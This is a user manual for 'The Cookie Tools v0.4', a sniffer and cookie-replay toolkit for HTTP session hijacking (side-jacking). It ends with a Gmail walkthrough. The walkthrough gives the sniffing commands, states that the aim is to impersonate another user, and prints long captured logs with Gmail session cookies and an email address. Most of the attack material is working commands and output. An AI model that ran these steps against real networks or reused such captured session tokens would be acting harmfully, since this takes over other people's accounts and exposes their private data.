The Cookie Tools v0.4

xenion - Michele Dallachiesa

michele dot dallachiesa at poste dot it

Contents

• Introduction
• cookiesniffer
  • Usage
  • How it works
  • Dependencies, compilation and execution
  
  
• analyzers
  • Usage
  • Dependencies and execution
  
  
• cookieserver
  • Usage
  • How it works
  • Dependencies and execution
  
  
• Full example (Gmail)
• Links

Introduction

With those tools you can intercept and log the headers of any HTTP connection (Cookies, URLs, ...), analyze the gathered information and perform the (Cookie, URL) replay attack in a few seconds. It supports also wireless (AP_DLT_IEEE802_11) networks. This project is released under license GPL version 2.

cookiesniffer

cookiesniffer is a simple and powerful Cookie sniffer that recognizes (through heuristics) and reconstructs (through libnids) new and existing HTTP connections, parsing any valid or partially valid HTTP message. The output is a set of files containing the gathered information with timestamps in a format that can be trivially searched and parsed with standard UNIX tools such as grep, awk, cut and sed. It supports wireless (AP_DLT_IEEE802_11) networks.

Usage

The unique mandatory input parameter is the packet source (network interface or pcap file). This is the list of accepted parameters:

INPUT

-r <str>

Read packets from file (pcap format) <str>

-i <str>

Read packets from network interface <str>

-L <int>

Force the datalink header length to <int> bytes. This is useful if the interface type is not correctly recognized by libpcap

OUTPUT

-d <str>

Set the output directory to <str>

-s

Save the sniffed+(injected into libnids) packets to file x/pkts.y.pcap where x is the output directory and y is the execution counter

-f

Disable stdout logging

-F

Enable syslog logging

-v

Be verbose

SELECT

-m

Sniff packets in promiscuous mode

-p <str>

Consider only packets matching the libpcap filter <str>

EXECUTION

-Z <str>

Run as user <str>

-D

Run in background (option -f implicit)

MISC

-0

Disable single packet handling (may cause information loss)

-t <str>

Include user-defined topdomains from (text) file <str>. Each line must be empty or it's treated as a new topdomain, ending with a newline. i.e.

xenion@gollum:~/dev/cookietools-0.4$ cat topdomains_file_example
.org.uk
.co.uk
.sch.uk

xenion@gollum:~/dev/cookietools-0.4$

-T

Exclude hardcoded topdomains

-l

List hardcoded topdomains

-h

Display a summary of the valid options and exit

The files in the output directory have the following naming scheme: The file with pattern log.x.txt refer to the cookiesniffer execution number x, the subset of files with pattern clientip-serverip.* refer to the HTTP connections from clientip to serverip (where clientip and serverip are IPv4 addresses). The set of output files of the cookiesniffer execution number x is organized as follows:

log.x.txt

The cookiesniffer execution log

clientip-serverip.txt

Information you can easily read

clientip-serverip.session

Information cookieserver can easily parse

The clientip-server.* files may contain information gathered from multiple TCP connections, respecting the temporal order of arrival of each single packet.

How it works

The captured packets are handled by libnids that reconstructs each new TCP connection. cookiesniffer reconstructs also already existing TCP connections by injecting well crafted TCP three-way handshakes into libnids. Each packet is also handled individually by a set of protocol dissectors. This is done because libnids won't reconstruct TCP connections with some lost TCP packets (this is correct but also causes an information loss). This may lead to some dup entries in the logs but it isn't a problem, the timestamps will always indicate the last valid value of each Cookie. According to rfc2616 (Hypertext Transfer Protocol - HTTP/1.1) section 4.4, the transfer-length of the HTTP message body can be determined in 5 ways. cookiesniffer supports ways 1, 3, 5 but not 2 ("chunked" transfer-coding) and 4 (media type "multipart/byteranges"). With 2 and 4 the connections state changes from "synchronized" to "desynchronized". The connections return "synchronized" with the first packet beginning with a valid HTTP message (this is called "resynchronization"). The Cookie domain of each Cookie HTTP header is derived considering the Host HTTP header and a list of (hardcoded, user-defined and first-level) topdomains. A topdomain is the most generic part of the domain name, like '.school.za', '.co.uk', '.com' and '.org'. The hardcoded list includes more than 500 second-level topdomains. The topdomains stuff is required in order to correctly handle cookies from different logical domains having the same name and the same first-level domain (i.e. cookie0 having [ name=PHPSESSION, domain=xyz.co.uk ] and cookie1 having [ name=PHPSESSION, domain=wuz.co.uk ]). For Set-Cookie HTTP headers there is no need of such heuristics because we have the exact value.

Dependencies, compilation and execution

This is a Unix-oriented application written in C. The compilation requires a C compiler like gcc and the following libs: libpcap (≥0.7), libnet (≥1.1) and libnids (≥1.20). In debian, you need (at least) the following packages:

• libnids1
• libnids-dev
• libnet1
• libnet1-dev
• libpcap0.7
• libpcap0.7-dev

To compile, type "make" in the cookietools top directory. The execution path follows.

cookiesniffer

bin/cookiesniffer

analyzers

In the bin/analyzers directory there are some Bash scripts that can help you to analyze quickly the logs of cookiesniffer. This is a brief description:

vision.sh

For each detected client (or for a specified client) it returns the links list, the Cookie hosts and the cookies value (the last value of each one). This is the most useful (and slow) script

links.sh

For each detected client it returns the Cookie hosts list and the links list

names.sh

For each detected client and for each detected cookies host it returns the list of the names of the cookies for that host

occurrences.sh

For each detected client it returns the list of the occurrences of each Cookie value (you must use it only when there aren't name collisions between cookies of different hosts, if happens the output is somewhat wrong)

Usage

This is the list of accepted parameters:

bin/analyzers/scriptname.sh log_directory

Where log_directory is the cookiesniffer output directory.

Dependencies and execution

The required standard UNIX tools are find, sed, grep, egrep, cut, cat, head, sort, tail, uniq. You must also have the Bash shell. The execution paths follow.

vision.sh

bin/analyzers/vision.sh

links.sh

bin/analyzers/links.sh

names.sh

bin/analyzers/names.sh

occurrences.sh

bin/analyzers/occurrences.sh

cookieserver

With cookieserver you can impersonate the cookies of someone else in your web browser using the logs of cookiesniffer. You can run cookieserver while cookiesniffer is gathering information from the network, the cookies value will be updated accordingly to their timestamps. This attack is also known as "side-jacking", "Cookie replay attack" and "HTTP session hijacking"... nothing new since ten years.

Usage

This is the list of accepted parameters:

bin/cookieserver/startup.sh log_directory client_ip ['static']

Where:

log_directory

is the cookiesniffer output directory

client_ip

is the IPv4 address of the target web user

'static'

instructs cookieserver to build static tmp files (optional)

When cookieserver is running, you must set 127.0.0.1:8181 as HTTP proxy in Firefox (I use the SwitchProxy plug-in). Going somewhere, proxyserver will return you an XHTML page that contains everything you need to forge your web browser cookies:

• Logdir and Client are the input parameters
• Faking host is the hostname that cookieserver is actually faking
• Cookie hosts is the list of the hosts with (sniffed) cookies
• Links is the list of retrieved URLs
• Set-Cookies is the list of Set-Cookie headers present in the HTTP headers of the current displayed XHTML page

When you visit URLs proposed in the Cookie hosts list, there will be always some matching domains between the Set-Cookie headers and the respective cookies will be set in your web browser (overwriting them if they're already set). You can use the cookies you have set simply restoring the original proxy settings in your web browser.

How it works

It's a set of Bash scripts that implement a simple HTTP web server. The TCP connections are handled with socat. Each HTTP reply includes the Set-Cookie headers you can see in the Set-Cookies list.

Dependencies and execution

The required standard UNIX tools are sed, grep, egrep, cut, cat, head, sort, tail, uniq. You must also have the Bash shell and socat, a multipurpose relay (SOcket CAT). It's also recommended to use the web browser Firefox with the SwitchProxy plug-in. The execution path follows.

cookieserver

bin/cookieserver/startup.sh

Full example (Gmail)

Scope: We want to gather, analyze and use the cookies/URLs at mail.google.com. First of all, we sniff the packets with cookiesniffer (sniff packets from network interface eth0, use './logz/' as output directory):

xenion@gollum:~/dev/cookietools-0.4$ mkdir logz
xenion@gollum:~/dev/cookietools-0.4$ sudo ./bin/cookiesniffer -i eth0 -d logz
 + cookiesniffer of The Cookie Tools v0.4 running here!
 + pid: 6128, date/time: 01/01/2008#13:22:38
 + Configuration
   + INPUT
     Packet source: iface 'eth0'
     Force datalink header length: disabled
   + OUTPUT
     Output directory: 'logz'
     Logfile: 'logz/0.txt'
     Save pcap: disabled
     stdout logging: enabled
     Syslog logging: disabled
     Be verbose: disabled
   + SELECT
     Sniff in promiscuous mode: disabled
     Add pcap filter: disabled
   + EXECUTION
     Running as user/group: root/root
     Running daemonized: disabled
   + MISC
     Single packet handling: enabled
     Count of user-defined topdomains (from file): 0
     Count of hardcoded topdomains: 506
 * You can dump stats sending me a SIGUSR2 signal
 * Reading packets...
 ! observing HTTP conn: 192.168.1.2:54439 > 64.233.161.83:80
 ! observing HTTP conn: 192.168.1.2:54204 > 72.14.221.19:80
 ! observing HTTP conn: 192.168.1.2:54205 > 72.14.221.19:80
 ! observing HTTP conn: 192.168.1.2:44438 > 66.249.93.189:80
 ! observing HTTP conn: 192.168.1.2:54207 > 72.14.221.19:80
 ! observing HTTP conn: 192.168.1.2:54208 > 72.14.221.19:80
 ! observing HTTP conn: 192.168.1.2:48642 > 212.58.226.79:80
 ! observing HTTP conn: 192.168.1.2:48643 > 212.58.226.79:80
 ! observing HTTP conn: 192.168.1.2:48644 > 212.58.226.79:80
 ! observing HTTP conn: 192.168.1.2:48645 > 212.58.226.79:80
 ! observing HTTP conn: 192.168.1.2:48646 > 212.58.226.79:80
 ! observing HTTP conn: 192.168.1.2:48647 > 212.58.226.79:80
 ! observing HTTP conn: 192.168.1.2:48648 > 212.58.226.79:80
 ! observing HTTP conn: 192.168.1.2:48649 > 212.58.226.79:80
 ! handling single HTTP pkt: 212.58.226.79:80 > 192.168.1.2:48643
 ! observing HTTP conn: 192.168.1.2:32818 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:47699 > 212.58.253.72:80
 ! observing HTTP conn: 192.168.1.2:32820 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:32821 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:32828 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:32827 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:32829 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:47702 > 212.58.253.72:80
 ! observing HTTP conn: 192.168.1.2:32830 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:47703 > 212.58.253.72:80
 ! observing HTTP conn: 192.168.1.2:32831 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:47704 > 212.58.253.72:80
 ! observing HTTP conn: 192.168.1.2:47705 > 212.58.253.72:80
 ! observing HTTP conn: 192.168.1.2:47706 > 212.58.253.72:80
 ! handling single HTTP pkt: 192.168.1.2:32831 > 213.144.186.200:80
 ! handling single HTTP pkt: 192.168.1.2:47703 > 212.58.253.72:80
 ! handling single HTTP pkt: 192.168.1.2:47704 > 212.58.253.72:80
 ! handling single HTTP pkt: 192.168.1.2:47705 > 212.58.253.72:80
 ! handling single HTTP pkt: 192.168.1.2:47706 > 212.58.253.72:80
 ! handling single HTTP pkt: 192.168.1.2:32827 > 213.144.186.200:80
 ! observing HTTP conn: 192.168.1.2:34053 > 194.129.79.25:80
 ! observing HTTP conn: 192.168.1.2:49997 > 212.58.227.137:80
 ! observing HTTP conn: 192.168.1.2:55773 > 62.189.244.254:80
 ! observing HTTP conn: 192.168.1.2:55774 > 62.189.244.254:80
 ! observing HTTP conn: 192.168.1.2:55775 > 62.189.244.254:80
--
Caught SIGINT signal (2), cleaning up...
--
 + Status
   Network Packets: 890
   Active HTTP Connections: 22
   Closed HTTP Connections: 11
   Detected HTTP Connections: 33
   Saved Cookies: 120
   Sync HTTP Connections: 21
   Desync HTTP Connections: 1
   Resync HTTP Connections: 10

xenion@gollum:~/dev/cookietools-0.4$

You can also get some statistics sending to the process a SIGUSR2 signal. The final output directory content is the following:

xenion@gollum:~/dev/cookietools-0.4$ ls logz
192.168.1.2-194.129.79.25.session    192.168.1.2-62.189.244.254.session
192.168.1.2-194.129.79.25.txt        192.168.1.2-62.189.244.254.txt
192.168.1.2-212.58.226.79.session    192.168.1.2-64.233.161.83.session
192.168.1.2-212.58.226.79.txt        192.168.1.2-64.233.161.83.txt
192.168.1.2-212.58.227.137.session   192.168.1.2-66.249.93.189.session
192.168.1.2-212.58.227.137.txt       192.168.1.2-66.249.93.189.txt
192.168.1.2-212.58.253.72.session    192.168.1.2-72.14.221.19.session
192.168.1.2-212.58.253.72.txt        192.168.1.2-72.14.221.19.txt
192.168.1.2-213.144.186.200.session  log.0.txt
192.168.1.2-213.144.186.200.txt
xenion@gollum:~/dev/cookietools-0.4$

This is the execution 0 (the first execution) and the file log.0.txt contains the execution log. Note that in the session file the "Cookie" HTTP headers are transformed in "Set-Cookie" HTTP headers using as path "/", as expires "Tuesday, 2-Feb-2020 02:02:02 GMT" and as domain the output of some heuristics (see §2.2). The session file contains also the retrieved URLs (they may contain relevant information about the session). Those are the logs of the connections from 192.168.1.2 (client) to 72.14.221.19 (server):

xenion@gollum:~/dev/cookietools-0.4$ cat logz/192.168.1.2-72.14.221.19.txt 
pktcount=21 time=01/01/2008#13:22:45.62716 src=192.168.1.2:54204 dst=72.14.221.19:80
s GET /mail/ HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
c0 name='GMAIL_LOGIN' value='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
c0 name='GMAIL_SU' value='1'
c0 name='GMAIL_STAT' value='lt=349&js=178&dw=220&ct=0&tot=2341&fv=1&id=964f0dea9a&v=tl&st=59&dbe=0&'
c0 name='MPRF' value='H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA'
c0 name='rememberme' value='true'

pktcount=27 time=01/01/2008#13:22:45.417327 src=192.168.1.2:54204 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache, no-store
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h Content-Encoding: gzip
h Content-Length: 1130
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:45 GMT
c0 type=SetCookie
c0 expires='Mon, 31-Dec-07 12:22:45 GMT'
c0 path='/mail'
c0 domain='.google.com'
c0 name='GMAIL_RTT' value='EXPIRED'
c1 type=SetCookie
c1 expires='Mon, 31-Dec-07 12:22:45 GMT'
c1 path='/mail'
c1 name='GMAIL_STAT' value='EXPIRED'
c2 type=SetCookie
c2 expires='Mon, 31-Dec-07 12:22:45 GMT'
c2 path='/mail'
c2 domain='.google.com'
c2 name='GMAIL_LOGIN' value='EXPIRED'

pktcount=31 time=01/01/2008#13:22:48.77440 src=192.168.1.2:54204 dst=72.14.221.19:80
s GET /mail/?ui=1&ik=&search=inbox&view=tl&start=0&init=1&zx=9plajc7d6rg HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/?ui=1&view=page&name=hist2&ver=1oix8vgy6z0pb
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
c0 name='GMAIL_LOGIN' value='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
c0 name='GMAIL_SU' value='1'
c0 name='GBE' value='bf-i'
c0 name='MPRF' value='H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA'
c0 name='rememberme' value='true'

pktcount=37 time=01/01/2008#13:22:48.482154 src=192.168.1.2:54204 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache, no-store
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h Content-Encoding: gzip
h Content-Length: 3308
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:48 GMT
c0 type=SetCookie
c0 expires='Mon, 31-Dec-07 12:22:48 GMT'
c0 path='/mail'
c0 name='GBE' value='EXPIRED'
c1 type=SetCookie
c1 expires='Mon, 31-Dec-07 12:22:48 GMT'
c1 path='/mail'
c1 domain='.google.com'
c1 name='GMAIL_RTT' value='EXPIRED'
c2 type=SetCookie
c2 expires='Mon, 31-Dec-07 12:22:48 GMT'
c2 path='/mail'
c2 domain='.google.com'
c2 name='GMAIL_LOGIN' value='EXPIRED'
c3 type=SetCookie
c3 expires='Mon, 31-Dec-07 12:22:48 GMT'
c3 path='/mail'
c3 name='GMAIL_SU' value='EXPIRED'

pktcount=43 time=01/01/2008#13:22:48.529655 src=192.168.1.2:54204 dst=72.14.221.19:80
s GET /mail/channel/test?at=xn3j2v99py493ewyy79lojwafijvez&MODE=init&zx=tq882kz7xgn1&it=2382 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/?ui=1&view=page&name=js&ver=1mys3lzt1f6w0
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
c0 name='GMAIL_LOGIN' value='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
c0 name='GMAIL_SU' value='1'
c0 name='MPRF' value='H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA'

pktcount=52 time=01/01/2008#13:22:48.702307 src=192.168.1.2:54205 dst=72.14.221.19:80
s GET /mail/?ui=1&view=cbj&zx=5t98v1rwy7ch HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/?ui=1&view=page&name=js&ver=1mys3lzt1f6w0
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
c0 name='GMAIL_LOGIN' value='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
c0 name='GMAIL_SU' value='1'
c0 name='MPRF' value='H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA'
c0 name='rememberme' value='true'

pktcount=54 time=01/01/2008#13:22:48.796548 src=192.168.1.2:54204 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Encoding: gzip
h Content-Length: 40
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:49 GMT

pktcount=62 time=01/01/2008#13:22:49.172142 src=192.168.1.2:54205 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache, no-store
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h Content-Encoding: gzip
h Content-Length: 1519
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:49 GMT
c0 type=SetCookie
c0 expires='Mon, 31-Dec-07 12:22:49 GMT'
c0 path='/mail'
c0 domain='.google.com'
c0 name='GMAIL_RTT' value='EXPIRED'
c1 type=SetCookie
c1 expires='Mon, 31-Dec-07 12:22:49 GMT'
c1 path='/mail'
c1 domain='.google.com'
c1 name='GMAIL_LOGIN' value='EXPIRED'

pktcount=66 time=01/01/2008#13:22:49.673923 src=192.168.1.2:54204 dst=72.14.221.19:80
s GET /mail/im/dropupdown.gif HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/?ui=1&ik=&search=inbox&view=tl&start=0&init=1&zx=9plajc7d6rg
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
c0 name='GMAIL_LOGIN' value='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
c0 name='GMAIL_SU' value='1'
c0 name='GMAIL_STAT' value='lt=426&js=170&dw=228&ct=0&tot=2029&fv=1&id=caed9113f5&v=tl&st=56&dbe=0&'
c0 name='MPRF' value='H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA'
c0 name='rememberme' value='true'

pktcount=95 time=01/01/2008#13:22:51.468390 src=192.168.1.2:54207 dst=72.14.221.19:80
s GET /mail/channel/test?at=xn3j2v99py493ewyy79lojwafijvez&at=xn3j2v99py493ewyy79lojwafijvez&TYPE=xmlhttp&zx=28vid2kb03y6&it=1014 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: close
h Referer: http://mail.google.com/mail/?ui=1&view=page&name=js&ver=1mys3lzt1f6w0
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
c0 name='GMAIL_LOGIN' value='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
c0 name='GMAIL_SU' value='1'

pktcount=101 time=01/01/2008#13:22:51.786081 src=192.168.1.2:54207 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/plain; charset=utf-8
h ETag: 
h Transfer-Encoding: chunked
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:52 GMT
h Connection: Close

pktcount=109 time=01/01/2008#13:22:53.803908 src=192.168.1.2:54205 dst=72.14.221.19:80
s POST /mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&VER=4&RID=13352&CVER=2&zx=kknfxdxr9o2a&it=3536 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Content-Type: application/x-www-form-urlencoded
h Referer: http://mail.google.com/mail/?ui=1&view=page&name=js&ver=1mys3lzt1f6w0
h Content-Length: 50
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
